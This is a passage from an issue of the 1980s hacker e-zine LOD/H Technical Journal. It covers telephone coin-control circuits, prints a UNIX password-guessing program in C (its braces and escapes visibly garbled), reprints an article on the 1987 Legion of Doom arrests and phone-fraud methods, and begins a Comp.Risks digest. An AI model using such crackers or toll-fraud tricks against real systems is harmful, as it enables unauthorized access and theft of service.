No. 5 office by either frequencies or multiwinks. The No. 5 office receives
|
||
these signals and the trunk applies one pulse of coin collect or return or
|
||
ring back. The No. 5 TSPS trunk dose not make a test to see if the required
|
||
coin action is successful. If the coin is still present the call is dropped
|
||
and the coin remains in the trap.
|
||
|
||
|
||
ESS
|
||
|
||
ESS offices provide all coin control actions from the Coin Control
|
||
Circuit. The Coin Control Circuit is switched to a customers line under
|
||
program control. The Coin Control Circuits always make a stuck coin test at
|
||
the end of a call.
|
||
ESS offices handle coin actions required by DDD or TSPS operators by
|
||
scanning the TSPS trunk looking for any control signals from the TSPS base
|
||
unit. When the ESS office sees a request on the TSPS trunk the ESS office
|
||
opens the talking path and attaches a multifrequency (MF) reciever. The MF
|
||
reciever looks at the tones being sent from the TSPS base unit transmitter and
|
||
checks if the signal requested is a coin collect, coin return, ring back, or
|
||
operator attached.
|
||
Dial-Tone First (DTF) offices not equipped with expanded In-Band
|
||
Signaling give +48V talk battery during operator attached and 48V talk
|
||
batttery during the rest of the call. If the TSPS signals for coin return the
|
||
ESS office will open the talk path again, release the MF receiver and switch
|
||
the line to the Coin Control Circuit which applies -130V coin return
|
||
potential. After the coin control function is finished the system will make
|
||
on recycle attempt if the coin ground is still present.
|
||
Local calls are handled within the ESS machine. When a coin control
|
||
function is required the program momentarily opens the talk path and switches
|
||
the line to a Coin Control C cuit which applies the required current.
|
||
|
||
Step By Step
|
||
Coin lines in a Step By Step area are served on dedicated Line Finder
|
||
groups. The Line Finders are hardwired to a coin box trunk and then cabled to
|
||
a first selector appearance.
|
||
Step By Step offices can give coin return from coin box trunks,
|
||
TSPS/Cordboard trunks, and other miscellaneous trunks. (My knowledge of Step
|
||
By Step is vague, it's kind of like trying to research dinosaurs.)
|
||
Step By Step offices handle coin actions on local calls in the coin box
|
||
trunks. The coin box trunk applies the coin control current through the
|
||
winding of a relay to the coin station hopper trigger ground. When the coin
|
||
station ground disappears, the coin box trunk relay releases and allows the
|
||
connection to restore to normal. Some Step By Step offices have a timed
|
||
release circuit that will time out after about eight attempts of coin control
|
||
action, peg the stuck coin register, then release. If the timed release
|
||
circuit is not provided and a coin ground can not be removed, the circuit must
|
||
be manually released.
|
||
Step By Step offices handle coin actions required by DDD calls or TSPS
|
||
operators in the Step By Step TSPS trunk. The TSPS base unit signals the Step
|
||
office by either frequencies or multiwinks. The Step office trunk recicves
|
||
these signals and trunk applies one pulse of coin collect, coin return or ring
|
||
back. The trunk does not make a test to see if the action was successful.
|
||
If a DDD call was completed to a busy number the Step By Step TSPS trunk
|
||
will apply one quick pu e of coin return toward the coin station, then the
|
||
coin box will check to see if the coin ground has disappeared. If the ground
|
||
is still present the coin box trunk will repeat the attempt to collect the
|
||
coin.
|
||
|
||
|
||
If you have any further questions about how the central office handles
|
||
coin service or about coin service in general, I can be reached via E-mail on
|
||
The Phoenix Project at 512/441-3088.
|
||
|
||
Oct 1988 - Phase Jitter....Legion of Doom/Hackers!
|
||
|
||
|
||
|
||
|
||
|
||
|
||
|
||
The LOD/H Technical Journal, Issue #3: File 09 of 11
|
||
|
||
----------------> UNIX Password Hacker: Courtesy of USENET <------------------
|
||
|
||
The following is an extensive unix password hacking program taken off
|
||
USENET awhile back. It resembles Shooting Sharks' HPW.C program in some ways
|
||
but this program has more options. Read the REM statements to determine what
|
||
options you wish to enable. If nothing else, this program can give those who
|
||
wish to write a similar program an idea of how and what you want to put in it.
|
||
|
||
|
||
- - - - - - - - - - - - - - - - - cut here - - - - - - - - - - - - - - - - - -
|
||
-
|
||
|
||
|
||
#include <stdio.h>
|
||
#include <pwd.h>
|
||
#include <ctype.h>
|
||
|
||
#define index strchr
|
||
#ifndef lint
|
||
static char *rcsid = "$Header: pwchkr.c,v 1.2 85/11/30 22:42:07 richl Exp $";
|
||
#endif
|
||
|
||
/*
|
||
* Warning: this program burns a lot of cpu.
|
||
*/
|
||
/*
|
||
* pwchkr - find accounts with poor passwords
|
||
Date: Tue, 29 Nov 83 18:19:32 pst
|
||
From: leres%ucbarpa@Berkeley (Craig Leres)
|
||
Modified by Seth Alford, Roger Southwick, Steve Dum, and
|
||
Rick Lindsley for Tektronix
|
||
*/
|
||
|
||
/*
|
||
* $Log: pwchkr.c,v $
|
||
* Revision 1.2 85/11/30 22:42:07 richl
|
||
* Added code to allow for password aging.
|
||
*
|
||
* Revision 1.1 85/09/10 16:00:56 root
|
||
* Initial revision
|
||
*
|
||
*
|
||
* By default, this program only checks for accounts with passwords the same
|
||
* as the login name. The following options add more extensive checking. (The
|
||
* tradeoff is cpu time -- with all options enabled it can run into the 100's
|
||
* of MINUTES.) Any argument that does not begin with a "-" is assumed to be
|
||
* a file name. (A single '-' means stdin.) If no file name is given,
|
||
* /etc/passwd is used.
|
||
*
|
||
* Options:
|
||
*
|
||
* -v: verbose -- list all guesses on stdout
|
||
* -u: output teh username on the line of the password file
|
||
* currently being checked. If the program stops
|
||
* abruptly you will then know how far it got.
|
||
* -w file: use the list of words contained in "file" as likely
|
||
* passwords. Words in the file are one to a line.
|
||
* -b: check all guesses backwards too
|
||
* -g: use the Full Name portion of the gecos field to
|
||
* generate more guesses
|
||
* -s: check the single letters a-z, A-Z, 0-9 as passwords
|
||
* -c: with each guess, check for all-lowercase and
|
||
* all-uppercase versions too.
|
||
* -n: complain about null passwords (default is to keep
|
||
quiet)
|
||
*/
|
||
|
||
int verbose = 0, singles = 0, backwards = 0, checkgecos = 0, checkcase = 0,
|
||
chknulls = 0, users = 0, chkwords = 0;
|
||
|
||
char *index(), *reverse();
|
||
long atol();
|
||
FILE *fopen();
|
||
char *fgets();
|
||
|
||
char PASSWD[] = "/etc/passwd";
|
||
char EMPTY[] = "";
|
||
static FILE *pwf = NULL, *wlf = NULL;
|
||
char line[BUFSIZ+1];
|
||
struct passwd passwd;
|
||
char *Curpw, *Wordlist = NULL;
|
||
|
||
main(argc, argv)
|
||
char **argv;
|
||
$
|
||
register int i;
|
||
register char *arg;
|
||
int onedone = 0;
|
||
|
||
|
||
for (i = 1; i < argc; i++)
|
||
if ((arg = argv[i]) && *arg == '-')
|
||
while (*++arg) $
|
||
switch (*arg) $
|
||
case 'n':
|
||
/*
|
||
* complain about null passwords
|
||
*/
|
||
chknulls++;
|
||
break;
|
||
case 'c':
|
||
/*
|
||
* check cases
|
||
*/
|
||
checkcase++;
|
||
break;
|
||
case 'g':
|
||
/*
|
||
* use gecos
|
||
*/
|
||
checkgecos++;
|
||
break;
|
||
case 'v':
|
||
/*
|
||
* turn on motormouth
|
||
*/
|
||
verbose++;
|
||
break;
|
||
case 'b':
|
||
/*
|
||
* check all attempts forwards and backwards
|
||
*/
|
||
backwards++;
|
||
break;
|
||
case 's':
|
||
/*
|
||
* carry out a more intensive search, checking for
|
||
* single letter passwords
|
||
*/
|
||
singles++;
|
||
break;
|
||
case 'u':
|
||
/*
|
||
* print out users as testing
|
||
*/
|
||
users++;
|
||
break;
|
||
case 'w':
|
||
/*
|
||
* consult word list of likely passwords
|
||
*/
|
||
if ((Wordlist = argv[i+1]) == NULL) $
|
||
fprintf(stderr,
|
||
"%s: No file supplied with -w optionXn",
|
||
argv[0]);
|
||
exit (1);
|
||
|
||
argv[i+1] = NULL;
|
||
break;
|
||
case 'X0':
|
||
/*
|
||
* read from stdin
|
||
*/
|
||
break;
|
||
default:
|
||
fprintf(stderr,
|
||
"%s: unknown option '%c'. Options are:Xn",argv[0],
|
||
*arg);
|
||
/* FALL THRU */
|
||
case '-':
|
||
fprintf(stderr,"-v:XtXtverbose -- list all guesses on
|
||
stdoutXn");
|
||
fprintf(stderr,"-u:XtXtoutput the username currently
|
||
being checkedXn");
|
||
fprintf(stderr,"-w file:Xtconsult the indicated file
|
||
for words to check as passwordsXn");
|
||
fprintf(stderr,"-b:XtXtcheck all guesses forwards and
|
||
backwardsXn");
|
||
fprintf(stderr,"-g:XtXtuse the Full name portion of the
|
||
gecos field for more guessesXn");
|
||
fprintf(stderr,"-s:XtXtcheck the single letters a-z,
|
||
A-Z, 0-9 as passwordsXn");
|
||
fprintf(stderr,"-c:XtXtcheck the all-upper and
|
||
all-lower case version of each guessXn");
|
||
fprintf(stderr,"-n:XtXtcomplain about null
|
||
passwordsXn");
|
||
exit(1);
|
||
|
||
argv[i] = NULL;
|
||
|
||
|
||
for (i = 1; i < argc; i++) $
|
||
if (argv[i] == NULL) continue;
|
||
onedone++;
|
||
if (*(argv[i]) == '-') $
|
||
/*
|
||
* read from stdin; we'll cheat and set pwf directly
|
||
*/
|
||
pwf = stdin;
|
||
chkpw();
|
||
/*
|
||
* don't fclose stdin!
|
||
*/
|
||
clearerr(stdin);
|
||
|
||
else $
|
||
if (setpwent(argv[i])) $
|
||
perror(argv[i]);
|
||
continue;
|
||
|
||
Curpw = argv[i];
|
||
chkpw();
|
||
endpwent();
|
||
|
||
|
||
if (!onedone) $
|
||
Curpw = NULL;
|
||
chkpw();
|
||
|
||
exit(0);
|
||
|
||
|
||
#define ARB_CONST 30000
|
||
|
||
chkpw()
|
||
|
||
$
|
||
register char *cp, *cp2;
|
||
register struct passwd *pwd;
|
||
struct passwd *getpwent();
|
||
char guess[100];
|
||
char *wordarray[ARB_CONST];
|
||
char *malloc(), **wordptr, **endptr;
|
||
int done = 0;
|
||
|
||
|
||
if (Wordlist)
|
||
$
|
||
if ((wlf = fopen(Wordlist,"r")) == NULL)
|
||
$
|
||
perror(Wordlist);
|
||
exit(1);
|
||
|
||
|
||
wordptr = wordarray;
|
||
/*
|
||
* note that endptr points to space OUTSIDE of wordarray
|
||
*/
|
||
endptr = wordarray + (sizeof(wordarray)/sizeof(char *));
|
||
|
||
while (fscanf(wlf,"%[^Xn]Xn",guess) != EOF)
|
||
$
|
||
if (wordptr == endptr)
|
||
$
|
||
fprintf(stderr,"Ran out of wordlist space. ARB_CONST %d must be
|
||
too small.Xn", ARB_CONST);
|
||
exit(1);
|
||
|
||
if ((*wordptr = malloc(1+strlen(guess))) == NULL)
|
||
$
|
||
fprintf(stderr,"malloc: no more memory for wordlistXn");
|
||
exit (1);
|
||
|
||
strcpy(*wordptr,guess);
|
||
wordptr++;
|
||
|
||
*wordptr = NULL;
|
||
|
||
|
||
while ((pwd = getpwent()) != 0 ) $
|
||
|
||
if (verbose || users) $
|
||
if (Curpw == NULL)
|
||
printf("Xt%s X"%sX"Xn", pwd->pw_name, pwd->pw_gecos);
|
||
else
|
||
printf("%s -- Xt%s X"%sX"Xn", Curpw, pwd->pw_name,
|
||
pwd->pw_gecos);
|
||
fflush(stdout);
|
||
|
||
if (*pwd->pw_passwd == 'X0') $
|
||
if (chknulls) $
|
||
if (Curpw == NULL)
|
||
printf("Problem: null passwd:Xt%sXtshell: %sXn",
|
||
pwd->pw_name, pwd->pw_shell);
|
||
else
|
||
printf("%s -- Problem: null passwd:Xt%sXtshell: %sXn",
|
||
Curpw, pwd->pw_name, pwd->pw_shell);
|
||
fflush(stdout);
|
||
|
||
continue;
|
||
|
||
/*
|
||
* Try the user's login name
|
||
*/
|
||
if (uandltry(pwd,pwd->pw_name))
|
||
continue;
|
||
|
||
/*
|
||
* Try names from the gecos field
|
||
*/
|
||
if (checkgecos) $
|
||
strcpy(guess, pwd->pw_gecos);
|
||
cp = guess;
|
||
if (*cp == '-') cp++; /* special gecos field */
|
||
if ((cp2 = index(cp, ';')) != NULL)
|
||
*cp2 = 'X0';
|
||
|
||
for (;;) $
|
||
if ((cp2 = index(cp, ' ')) == NULL) $
|
||
if (uandltry(pwd,cp))
|
||
done++;
|
||
break;
|
||
|
||
|
||
*cp2 = 'X0';
|
||
|
||
if (uandltry(pwd,cp)) $
|
||
done++;
|
||
break;
|
||
|
||
cp = ++cp2;
|
||
|
||
|
||
|
||
if (!done && Wordlist)
|
||
$
|
||
/*
|
||
* try the words in the wordlist
|
||
*/
|
||
wordptr = wordarray;
|
||
while (endptr != wordptr)
|
||
$
|
||
if (*wordptr == NULL)
|
||
break;
|
||
if (uandltry(pwd,*wordptr++))
|
||
$
|
||
done++;
|
||
break;
|
||
|
||
|
||
|
||
if (!done && singles) $
|
||
/*
|
||
* Try all single letters
|
||
* (try digits too . --Seth)
|
||
*/
|
||
guess[1] = 'X0';
|
||
for (guess[0]='a'; guess[0] <= 'z'; guess[0]++)
|
||
if (try(pwd,guess))
|
||
break;
|
||
for (guess[0]='A'; guess[0] <= 'Z'; guess[0]++)
|
||
if (try(pwd,guess))
|
||
break;
|
||
for (guess[0]='0'; guess[0] <= '9'; guess[0]++)
|
||
if (try(pwd,guess))
|
||
break;
|
||
|
||
|
||
|
||
|
||
/*
|
||
* Stands for "upper and lower" try. Calls the "real" try, below,
|
||
* with the supplied version of the password, and with
|
||
* an upper and lowercase version of the password. If the user doesn't
|
||
* want to try upper and lower case then we just return after the one
|
||
* check.
|
||
*/
|
||
|
||
uandltry (pwd,guess)
|
||
char *guess;
|
||
struct passwd *pwd;
|
||
$
|
||
register char *cp;
|
||
char buf[100];
|
||
int alllower, allupper;
|
||
|
||
alllower = allupper = 1;
|
||
|
||
if (try(pwd,guess) || (backwards && try(pwd,reverse(guess)))) return (1);
|
||
|
||
if (!checkcase) return(0);
|
||
|
||
strcpy (buf, guess);
|
||
cp = buf-1;
|
||
while (*++cp) $
|
||
if (isupper(*cp))
|
||
alllower = 0;
|
||
if (islower(*cp))
|
||
allupper = 0;
|
||
|
||
|
||
if (!allupper) $
|
||
for ( cp=buf; *cp != 'X0'; cp++)
|
||
if (islower (*cp))
|
||
*cp += 'A' - 'a';
|
||
|
||
if (try(pwd,buf) || (backwards && try(pwd,reverse(buf)))) return (1);
|
||
|
||
|
||
if (!alllower) $
|
||
for ( cp = buf; *cp != 'X0'; cp++)
|
||
if (isupper (*cp))
|
||
*cp += 'a' - 'A';
|
||
|
||
if (try(pwd,buf) || (backwards && try(pwd,reverse(buf)))) return (1);
|
||
|
||
return (0);
|
||
|
||
|
||
try(pwd,guess)
|
||
char *guess;
|
||
register struct passwd *pwd;
|
||
$
|
||
register char *cp;
|
||
char *crypt ();
|
||
|
||
if (verbose) $
|
||
if (Curpw == NULL)
|
||
printf ("Trying X"%sX" on %sXn", guess, pwd -> pw_name);
|
||
else
|
||
printf ("%s -- Trying X"%sX" on %sXn", Curpw, guess,
|
||
pwd -> pw_name);
|
||
fflush (stdout);
|
||
|
||
if (! guess || ! *guess) return(0);
|
||
cp = crypt (guess, pwd -> pw_passwd);
|
||
if (strcmp (cp, pwd -> pw_passwd))
|
||
return (0);
|
||
if (Curpw == NULL)
|
||
printf ("Problem: Guessed:Xt%sXtshell: %s passwd: %sXn",
|
||
pwd -> pw_name, pwd -> pw_shell, guess);
|
||
else
|
||
printf ("%s -- Problem: Guessed:Xt%sXtshell: %s passwd: %sXn",
|
||
Curpw, pwd -> pw_name, pwd -> pw_shell, guess);
|
||
fflush (stdout);
|
||
return (1);
|
||
|
||
/* end of PW guessing program */
|
||
|
||
#define MAXUID 0x7fff /* added by tonyb 12/29/83 */
|
||
/* altered to a reasonable number - mae 8/20/84 */
|
||
|
||
/*
|
||
* Add a parameter to "setpwent" so I can override the file name.
|
||
*/
|
||
|
||
setpwent(file)
|
||
char *file;
|
||
$
|
||
if ((pwf = fopen(file,"r")) == NULL)
|
||
return(1);
|
||
return(0);
|
||
|
||
|
||
endpwent()
|
||
|
||
$
|
||
fclose(pwf);
|
||
pwf = NULL;
|
||
|
||
|
||
char *
|
||
pwskip(p)
|
||
register char *p;
|
||
$
|
||
while(*p && *p != ':' && *p != 'Xn')
|
||
++p;
|
||
if(*p == 'Xn')
|
||
*p = 'X0';
|
||
else if(*p)
|
||
*p++ = 'X0';
|
||
return(p);
|
||
|
||
|
||
struct passwd *
|
||
getpwent()
|
||
$
|
||
register char *p;
|
||
long x;
|
||
|
||
if(pwf == NULL)
|
||
if (setpwent(PASSWD)) $
|
||
perror(PASSWD);
|
||
return(NULL);
|
||
|
||
p = fgets(line, BUFSIZ, pwf);
|
||
if(p == NULL)
|
||
return(0);
|
||
passwd.pw_name = p;
|
||
p = pwskip(p);
|
||
passwd.pw_passwd = p;
|
||
p = pwskip(p);
|
||
x = atol(p);
|
||
passwd.pw_uid = (x < 0 || x > MAXUID)? (MAXUID+1): x;
|
||
p = pwskip(p);
|
||
x = atol(p);
|
||
passwd.pw_gid = (x < 0 || x > MAXUID)? (MAXUID+1): x;
|
||
passwd.pw_comment = EMPTY;
|
||
p = pwskip(p);
|
||
passwd.pw_gecos = p;
|
||
p = pwskip(p);
|
||
passwd.pw_dir = p;
|
||
p = pwskip(p);
|
||
passwd.pw_shell = p;
|
||
(void) pwskip(p);
|
||
|
||
p = passwd.pw_passwd;
|
||
/* while(*p && *p != ',')
|
||
p++;
|
||
if(*p)
|
||
*p++ = 'X0';
|
||
passwd.pw_age = p;
|
||
*/
|
||
return(&passwd);
|
||
|
||
|
||
|
||
|
||
/*
|
||
* reverse a string
|
||
*/
|
||
char *reverse(str)
|
||
char *str;
|
||
|
||
$
|
||
register char *ptr;
|
||
register int len;
|
||
char *malloc();
|
||
|
||
if ((ptr = malloc((len = strlen(str))+1)) == NULL)
|
||
return(NULL);
|
||
ptr += len;
|
||
*ptr = 'X0';
|
||
while (*str && (*--ptr = *str++))
|
||
;
|
||
return(ptr);
|
||
|
||
|
||
|
||
- - - - - - - - - - - - - - - - - cut here - - - - - - - - - - - - - - - - - -
|
||
-
|
||
|
||
The LOD/H Technical Journal, Issue #3: File 10 of 11
|
||
|
||
----------------> Clearing up the Mythical LOD/H Busts <------------------
|
||
|
||
|
||
Following is an article taken from Pirate-80 that Scan Man typed up which
|
||
talks about the summer busts of 87. They called it the "LOD" case but as
|
||
usuall, they were disillusioned. Our guess is that Oryan Quest was one of the
|
||
first to be investigated, and due to his calling of other hackers when a DNR
|
||
was on his line, led the authorities to the others who were eventually
|
||
visited. Oryan claimed he was in LOD and this is where they must have gotten
|
||
the idea that everyone he spoke to was in LOD also. In this respect the
|
||
article is rather humorous in that they caught people who were not in LOD/H.
|
||
Normally we would not put reprints of magazine articles in the LOD/H Technical
|
||
Journal, but seeing how it is relevant in clearing up any misconceptions, we
|
||
decided to put it in.
|
||
|
||
------------------------------------------------------------------------------
|
||
Remember, Oryan Quest is *NOT* now, *NEVER* has, and *NEVER* will be in LOD/H!
|
||
------------------------------------------------------------------------------
|
||
|
||
From: SCAN MAN
|
||
To: ALL
|
||
Subj: LEGION OF DOOM BUST
|
||
|
||
|
||
WAR AGAINST PHONE HACKING HEATS UP
|
||
BY GREGG PEARLMAN, ANTIC ASSISTANT EDITOR
|
||
|
||
Computer break-ins are no longer viewed as harmless pranks. For example,
|
||
unauthorized computer access is a misdemeanor under 502PC of the California
|
||
Penal Code if you just trespass and browse around -- and if it's your first
|
||
offense.
|
||
But: "Any person who maliciously accesses, alters, deletes, damages, destroys
|
||
or disrupts the operation of any computer system, computer network, computer
|
||
program or data is guilty of public offense" -- a felony under Section C of
|
||
that code. Even changing a password to "Gotcha" is a felony if it can be
|
||
proven that it was a "malicious access."
|
||
In California, the maximum punishment is state imprisonment, a $10,000 fine and
|
||
having your equipment confiscated. The penalty depends on who you are, your
|
||
prior record and the seriousness of the crime.
|
||
And you don't have to, for instance, breach national security to be guilty of a
|
||
felony. Accessing even a simple system of a small company could damage vital
|
||
data for more than a year's worth of business, especially if that company
|
||
didn't properly back up its data.
|
||
There are all kinds of computer crime. Stealing an automated teller machine
|
||
card and withdrawing money from an account is a computer crime because you're
|
||
using a computer to get money out of a system. But simply trespassing in a
|
||
system and not doing any damage is normally a misdemeanor, according to Sgt.
|
||
John McMullen of the Stanford University Police Services. This kind of crime
|
||
has become very common. "Every kid with a computer is tempted," he said.
|
||
Unfortunately, it can take months to complete an investigation. For instance,
|
||
the so-called "LEGION OF DOOM" case, beginning in September, 1986, took 10
|
||
months to solve and involved people in Maryland, New York, Pennsylvania, Oregon
|
||
and California.
|
||
If someone breaks into the computers of, for example, California's Pacific
|
||
Bell, and the break-in is severe, Pacific Bell Security gets warrants issued,
|
||
and then, with the police, confiscates computers, manuals, telephone lists and
|
||
directories -- all related equipment. It's common for the computer to be tied
|
||
up for a few months as evidence. (And by the time Pacific Bell Security does
|
||
get involved, the evidence is usually overwhelming -- the conviction rate is
|
||
extremely high.)
|
||
"Whenever I'm involved in a case," said McMullen, "I ask the judge for
|
||
permission to confiscate the equipment. That's one big incentive for hackers
|
||
not to do this kind of stuff. I haven't had any repeaters, but I know of one
|
||
case where the guy probably WILL do it again when he gets out.
|
||
"Usually the shock of what happens to a juvenile's parents -- who bought the
|
||
equipment and watched it get confiscated -- is enough to make them stop. But we
|
||
don't really have enough cases to know what the parents do."
|
||
|
||
|
||
ACCESS
|
||
|
||
"It's easy for hackers to find company phone numbers," said Daniel Suthers,
|
||
Atari user and operations manager at Pacific Bell in Concord, California.
|
||
"Most large companies have a block of 500 to 1,000 phone numbers set aside for
|
||
their own use. At least one line will have a modem.
|
||
"People post messages on hacker/phreaker bases on some BBS's and say 'I don't
|
||
know who this phone number belongs to, but it's a business, judging by the
|
||
prefix, and has a 1200-baud tone.' Then it's open season for the hackers and
|
||
phreakers."
|
||
|
||
Phreakers aren't much different than hackers -- they're just specifically
|
||
telephone-oriented. In "CompuTalk: Texas-Sized BBS" (Antic, August 1987),
|
||
sysop Kris Meier discussed phreakers who appear to have called from phone
|
||
numbers other than the ones they were actually using. A computer isn't needed
|
||
to do this -- it's usually done with a "blue box."
|
||
|
||
"The blue boxes were used mostly in the late 1960s and early '70s," said
|
||
McMullen. "They fool the network and let people make free long distance calls
|
||
-- a tone generator simulates the signalling codes used by long distance
|
||
operators. The boxes were phased out a couple of years ago, though: they no
|
||
longer let hackers access AT&T, but Sprint and MCI can be accessed by something
|
||
similar. However, computer programs are normally used now."
|
||
|
||
To get long-distance phone service, hackers now use one of several programs
|
||
passed among other hackers (on bulletin boards, for example). They find the
|
||
local access number for Sprint or MCI and then run the program -- perhaps for a
|
||
few days. It generates and dials new phone numbers, and the hackers can check
|
||
to see how many new or free codes they've turned up.
|
||
|
||
They can post the codes on a BBS, and their friends will use them until they
|
||
get stopped by the long-distance company -- depending on how long it takes the
|
||
company to realize that these numbers hadn't been issued yet -- or until the
|
||
customers discover that their numbers have been accessed by someone who isn't
|
||
"authorized."
|
||
|
||
Bulletin boards can be especially easy prey. "If a hacker knew your BBS
|
||
program intimately, he could probably figure it out, but that's messy," said
|
||
Suthers. "If he can find a back door, it's easier. Sysops are notorious for
|
||
putting in their own back doors because, though they have all the security
|
||
under the sun on the FRONT doors, they still want to get in without problems.
|
||
It's just like what happened in the films Tron and Wargames -- which probably
|
||
taught a whole generation a lot of things."
|
||
|
||
Meier had said in the August, 1987 issue of Antic that someone once called his
|
||
board COLLECT. Simply put, the caller fooled the operator. McMullen says
|
||
that's been around for a long time. "It's common in prisons and situations
|
||
where the phones are restricted." McMullen also said that if the timing is just
|
||
right, as soon as the modem answers, the phreaker can wait for an operator to
|
||
say "Will you accept the charges," then say "Yes." The operator can't tell
|
||
which end said yes, and if the modem has a long delay before the connect tone,
|
||
the phreaker can get away with it. It couldn't be done entirely electronically
|
||
-- the voice contact is needed.
|
||
|
||
"I've never run across people accessing online services such as CompuServe in
|
||
this way, but I'm sure it happens," said McMullen. "People suddenly get
|
||
strange charges on their phone bills. "The hackers I've dealt with are very
|
||
brilliant and good at what they do. Of course, when you do something all day
|
||
that you're really interested in, you're
|
||
GOING to be good at it."
|
||
|
||
|
||
DOOM
|
||
|
||
McMullen's most recent hacker case at Stanford University dealt with the Legion
|
||
of Doom, an elite group of hackers who broke into computers -- some containing
|
||
national defense-related items. "As I understand it, they're supposed to be the
|
||
top hackers in the nation," McMullen said. "I started investigating the case
|
||
when it began crossing state lines, getting a bit too big. I contacted the
|
||
FBI, who said that because of the Secret Service's jurisdiction over credit
|
||
card and telephone access fraud, they'd taken over computer crime
|
||
investigations that go across state lines -- actually, anything involving a
|
||
telephone access code. This case, of course, involved access codes, because
|
||
the Sprint and AT&T systems were used, and it was the Secret Service, not the
|
||
FBI, that made the arrests. "I think that the publicity from this case will
|
||
scare people, and there'll be a lot less hacking for a while. Some hackers are
|
||
afraid to do anything: they're afraid that the Secret Service is watching them,
|
||
too."
|
||
|
||
|
||
TRACING
|
||
|
||
AT&T, Sprint and MCI now have ANI -- Automatic Number Identification -- as does
|
||
Pacific Bell. It aids a great deal in detecting hackers. Pacific Bell usually
|
||
just assists in this type of investigation and identifies the hackers. "It's
|
||
easy to trace a call if the caller logs in more than once," said Suthers. "The
|
||
moment they dial in, a message is printed out -- before the phone even answers
|
||
-- pinpointing where it came from, where it went to, the whole shmeer.
|
||
|
||
"A blue box made it much harder to detect, but if a hacker used it
|
||
consistently, we could eventually trace it back. So if someone is in
|
||
California and makes it look as if he'd called from New York, we can trace it
|
||
across the country one way, and then back across. Generally, though if the
|
||
call IS billed to a New York number, the caller is actually somewhere like
|
||
Florida. But we can back-trace the call itself, especially if it's extremely
|
||
long."
|
||
|
||
But recently someone broke into Pacific Bell "through a fluke of
|
||
circumstances." Suthers said, "We closed down that whole area, so they can't
|
||
get back in that way, but if they dial the number again, they're in trouble."
|
||
If Pacific Bell Security detects a break-in, the area is secured immediately.
|
||
Sometimes hackers are steered toward a kind of "pseudo-system" that makes them
|
||
THINK they've broken in -- but in fact they're being monitored and traced.
|
||
As to how many hackers there are, who knows? There's a lot of misuse and
|
||
inside work that's never detected or reported.
|
||
|
||
|
||
SECURITY
|
||
|
||
Security systems are expensive, but someone with a lot of data and an important
|
||
system should seriously look into one. Very few hackers are caught, simply
|
||
because few corporations have good security systems. "Passwords should never be
|
||
names, places or anything that can be found in a dictionary," said Suthers.
|
||
"People shouldn't be able to just write a program to send words from their
|
||
AtariWriter Plus dictionary disk. Normally there should be a letter here, a
|
||
few numbers there -- garbage. Thus, if someone writes a program to generate
|
||
random symbols and keeps calling back until he breaks in, he'll probably be
|
||
traced. "Some corporations aren't very computer literate and don't worry about
|
||
things like passwords until they've been hit, which is a shame. But it's all
|
||
out there in the books. TRICKS OF THE UNIX MASTER (by Russell Sage, published
|
||
by SAMS Publications, $22.95) is a beautiful book that tells you exactly what
|
||
to do to avoid break-ins."
|
||
|
||
McMullen said that Stanford is trying to tighten up security by emphasizing the
|
||
importance of better passwords. "When researchers want to do their work,
|
||
however, they don't want to mess with passwords and codes," he said.
|
||
"Universities seem to want to make their systems easier for researchers to use.
|
||
The more accessible it is, obviously, the less security there is in terms of
|
||
passwords. It's easier to use your name as a password than some complicated
|
||
character string. "So any hacker worth his salt can go onto any computer system
|
||
and pull out an account. Especially with UNIX, it's very easy to access it,
|
||
entering as the password the first name of the person who has the account.
|
||
These Legion of Doom hackers used a program that actually found out what the
|
||
passwords were: it began by just checking the names. They were very successful
|
||
-- it was just unbelievable."
|
||
|
||
But McMullen feels that security fell way behind the advances made in
|
||
computers, and several avenues were left open for people to explore. "Often
|
||
these hackers don't mean to be malicious or destructive," he said, "but I think
|
||
they really feel triumphant at getting on. Sometimes they do damage without
|
||
realizing it, just by tramping through the system: shutting down phone lines,
|
||
programs and accounting systems." However, the strides made in security since
|
||
then have accounted for arrests, confiscations and convictions all over the
|
||
country -- but there are still many more to come.
|
||
|
||
|
||
|
||
|
||
|
||
|
||
The LOD/H Technical Journal, Issue #3: File 11 of 11
|
||
|
||
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
|
||
$ $
|
||
$ Network News & Notes $
|
||
$ $
|
||
$ Compiled from Comp.Risks Digest $
|
||
$ by $
|
||
$ The Mentor $
|
||
$ $
|
||
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
|
||
|
||
Comp.Risks Digest is a USENET distributed newsletter on risks to the
|
||
public from computer-related systems. It is frequently one of the first
|
||
places that bugs in operating systems show up. These are some of the more
|
||
interesting posts that have appeared in the past month.
|
||
|
||
----------------------------------------------------------------------------
|
||
|
||
Date: Wed, 5 Oct 88 12:35:37 EDT
|
||
From: Dave Wortman <dw@csri.toronto.edu>
|
||
Subject: Emergency Access to Unlisted Telephone Numbers
|
||
|
||
The article below was originally posted to misc.consumers. I thought it might
|
||
be of interest to RISKS readers as an example of a well-thought-out set of
|
||
administrative procedures designed to balance the needs of protection of
|
||
privacy and response to emergency situations.
|
||
|
||
=======================================================================
|
||
|
||
All examples in this message pertain to Illinois Bell Telephone Company, which
|
||
covers the Chicago metropolitan area, and quite a bit of the rest of Illinois.
|
||
|
||
There are three types of phone numbers which do not appear in the printed and
|
||
publicly available directory: (1) Too new to list (2) Non-listed (3) Non-pub.
|
||
[discussion of types (1) and (2) deleted.]
|
||
|
||
The third category of numbers not in the phone book or available from the
|
||
Directory Assistance Bureau are non-published numbers. Non-pub numbers are NOT
|
||
available at the Directory Assistance level. Inquiries about same which are
|
||
input into a DA terminal simply come up with a message that 'at the customer's
|
||
request, the number is not listed in our records; the number is non-published.'
|
||
|
||
Well, who does keep non-pub records then? The Business Office has no handy way
|
||
to retrieve them, since they depend on an actual phone number when they pull up
|
||
a record to discuss an account. Once a service order is processed, the number
|
||
and associated name are no longer available to the average worker in the
|
||
central office.
|
||
|
||
There was for several years a small group known as the 'NonPub Number Bureau'
|
||
which at the time was located in Hinsdale, IL. Needless to say, the phone
|
||
number to the NonPub Number Bureau was itself non-published, and was only
|
||
available to specified employees at Bell who were deemed to have a 'need to
|
||
know'. Now I think with all the records being highly computerized, the keepers
|
||
of the non-pub phone numbers are themselves scattered around from one phone
|
||
office to another.
|
||
|
||
When there is some specific need for an employee at the phone company to
|
||
acquire the non-published number of a subscriber, then certain security
|
||
